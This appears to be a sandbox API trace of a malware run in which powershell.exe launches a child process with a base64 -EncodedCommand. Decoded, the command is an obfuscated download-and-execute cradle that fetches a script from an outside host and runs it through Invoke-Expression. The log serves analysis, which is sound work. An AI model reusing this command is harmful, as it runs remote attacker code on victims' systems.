	[0817.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0817.398] SetErrorMode (uMode=0x1) returned 0x1
	[0817.398] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0817.398] SetErrorMode (uMode=0x1) returned 0x1
	[0817.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0817.398] SetErrorMode (uMode=0x1) returned 0x1
	[0817.398] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0817.399] SetErrorMode (uMode=0x1) returned 0x1
	[0817.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0817.399] SetErrorMode (uMode=0x1) returned 0x1
	[0817.399] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0817.399] SetErrorMode (uMode=0x1) returned 0x1
	[0817.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0817.400] SetErrorMode (uMode=0x1) returned 0x1
	[0817.400] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0817.400] SetErrorMode (uMode=0x1) returned 0x1
	[0817.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0817.400] SetErrorMode (uMode=0x1) returned 0x1
	[0817.400] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0817.401] SetErrorMode (uMode=0x1) returned 0x1
	[0817.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0817.401] SetErrorMode (uMode=0x1) returned 0x1
	[0817.401] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b8e0c80
	[0817.402] FindNextFileW (in: hFindFile=0x1b8e0c80, lpFindFileData=0x1c78dc30 | out: lpFindFileData=0x1c78dc30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0817.402] FindClose (in: hFindFile=0x1b8e0c80 | out: hFindFile=0x1b8e0c80) returned 1
	[0817.402] SetErrorMode (uMode=0x1) returned 0x1
	[0817.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c78dd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0817.403] SetErrorMode (uMode=0x1) returned 0x1
	[0817.403] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c78df50 | out: lpFileInformation=0x1c78df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0817.404] SetErrorMode (uMode=0x1) returned 0x1
	[0817.404] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0817.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.405] CoTaskMemFree (pv=0x51d230) 
	[0817.406] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0817.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.406] CoTaskMemFree (pv=0x51d230) 
	[0817.409] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0817.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.410] CoTaskMemFree (pv=0x51d230) 
	[0817.419] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0817.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.419] CoTaskMemFree (pv=0x51d230) 
	[0817.432] CoTaskMemAlloc (cb=0x3b) returned 0x4ede90
	[0817.432] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c78e138, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c78e138) returned 0x4550
	[0817.433] CoTaskMemFree (pv=0x4ede90) 
	[0817.436] GetConsoleWindow () returned 0x202d6
	[0818.639] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0818.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.639] CoTaskMemFree (pv=0x51d230) 
	[0818.640] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0818.640] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0818.640] CoTaskMemFree (pv=0x51d230) 
	[0818.646] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0818.646] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0818.646] CoTaskMemFree (pv=0x51d230) 
	[0818.649] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c78e180 | out: pNumArgs=0x1c78e180) returned 0x1b904c70*=""
	[0818.650] lstrlenW (lpString="-EncodedCommand") returned 15
	[0818.651] CoTaskMemAlloc (cb=0x22) returned 0x1b8ff360
	[0818.651] RtlMoveMemory (in: Destination=0x1b8ff360, Source=0x1b904c92, Length=0x20 | out: Destination=0x1b8ff360) 
	[0818.651] CoTaskMemFree (pv=0x1b8ff360) 
	[0818.651] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0818.651] CoTaskMemAlloc (cb=0x2f4) returned 0x1b92ae30
	[0818.651] RtlMoveMemory (in: Destination=0x1b92ae30, Source=0x1b904cb2, Length=0x2f2 | out: Destination=0x1b92ae30) 
	[0818.651] CoTaskMemFree (pv=0x1b92ae30) 
	[0818.652] LocalFree (hMem=0x1b904c70) returned 0x0
	[0818.653] CoTaskMemAlloc (cb=0x804) returned 0x1b92ae30
	[0818.653] GetConsoleTitleW (in: lpConsoleTitle=0x1b92ae30, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0818.655] CoTaskMemFree (pv=0x1b92ae30) 
	[0818.664] CoTaskMemAlloc (cb=0x38e) returned 0x1b904c70
	[0818.664] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c78e0e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ee3e08 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2ee3e08*(hProcess=0x35c, hThread=0x358, dwProcessId=0x1b94, dwThreadId=0x2310)) returned 1
	[0818.831] CoTaskMemFree (pv=0x1b904c70) 
	[0818.832] CloseHandle (hObject=0x358) returned 1
	[0818.832] CoTaskMemAlloc (cb=0x3b) returned 0x4ede90
	[0818.833] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c78e188, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c78e188) returned 0x4550
	[0818.833] CoTaskMemFree (pv=0x4ede90) 
	[0818.836] GetCurrentProcess () returned 0xffffffffffffffff
	[0818.836] GetCurrentProcess () returned 0xffffffffffffffff
	[0818.837] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c78e268, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c78e268*=0x358) returned 1

Process:
	id = "93"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x7621d000"
	os_pid = "0x11c0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 480
	os_tid = 0x11c4


Thread:
	id = 507
	os_tid = 0x1288


Thread:
	id = 510
	os_tid = 0x12a4


Thread:
	id = 1900
	os_tid = 0x2580


Thread:
	id = 1909
	os_tid = 0x25b0


Thread:
	id = 1961
	os_tid = 0x268c


Thread:
	id = 2069
	os_tid = 0x8a0


Process:
	id = "94"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6e72b000"
	os_pid = "0x1208"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 489
	os_tid = 0x120c

	[0826.922] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0836.499] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0836.499] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0836.499] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0836.499] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0921.461] sprintf_s (in: _DstBuf=0xceff8, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0944.231] GetVersionExW (in: lpVersionInformation=0xcdb00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdb00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.233] GetVersionExW (in: lpVersionInformation=0xcdb00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdb00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0944.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0944.876] GetVersionExW (in: lpVersionInformation=0xcd870*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd870*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.877] SetErrorMode (uMode=0x1) returned 0x1
	[0944.878] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd9d0 | out: lpFileInformation=0xcd9d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0944.879] SetErrorMode (uMode=0x1) returned 0x1
	[0944.883] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdc40 | out: lpdwHandle=0xcdc40) returned 0x94c
	[0944.885] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d572f0 | out: lpData=0x2d572f0) returned 1
	[0944.887] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdbb8, puLen=0xcdbb0 | out: lplpBuffer=0xcdbb8*=0x2d5738c, puLen=0xcdbb0) returned 1
	[0944.890] lstrlenW (lpString="䅁") returned 1
	[0944.899] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x2d57468, puLen=0xcdb20) returned 1
	[0944.900] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0944.902] CoTaskMemAlloc (cb=0x2e) returned 0x2aff50
	[0944.902] lstrcpyW (in: lpString1=0x2aff50, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0944.903] CoTaskMemFree (pv=0x2aff50) 
	[0944.903] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x2d574bc, puLen=0xcdb20) returned 1
	[0944.903] lstrlenW (lpString="System.Management.Automation") returned 28
	[0944.903] CoTaskMemAlloc (cb=0x3c) returned 0x2a3870
	[0944.903] lstrcpyW (in: lpString1=0x2a3870, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0944.903] CoTaskMemFree (pv=0x2a3870) 
	[0944.904] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x2d57518, puLen=0xcdb20) returned 1
	[0944.904] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0944.904] CoTaskMemAlloc (cb=0x20) returned 0x2f4ed0
	[0944.904] lstrcpyW (in: lpString1=0x2f4ed0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0944.904] CoTaskMemFree (pv=0x2f4ed0) 
	[0944.904] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x2d57558, puLen=0xcdb20) returned 1
	[0944.904] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0944.904] CoTaskMemAlloc (cb=0x44) returned 0x2a3870
	[0944.904] lstrcpyW (in: lpString1=0x2a3870, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0944.904] CoTaskMemFree (pv=0x2a3870) 
	[0944.904] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x2d575c0, puLen=0xcdb20) returned 1
	[0944.904] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0944.904] CoTaskMemAlloc (cb=0x76) returned 0x292fe0
	[0944.904] lstrcpyW (in: lpString1=0x292fe0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0944.904] CoTaskMemFree (pv=0x292fe0) 
	[0944.904] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x2d5765c, puLen=0xcdb20) returned 1
	[0944.904] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0944.904] CoTaskMemAlloc (cb=0x44) returned 0x2a3870
	[0944.904] lstrcpyW (in: lpString1=0x2a3870, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0944.904] CoTaskMemFree (pv=0x2a3870) 
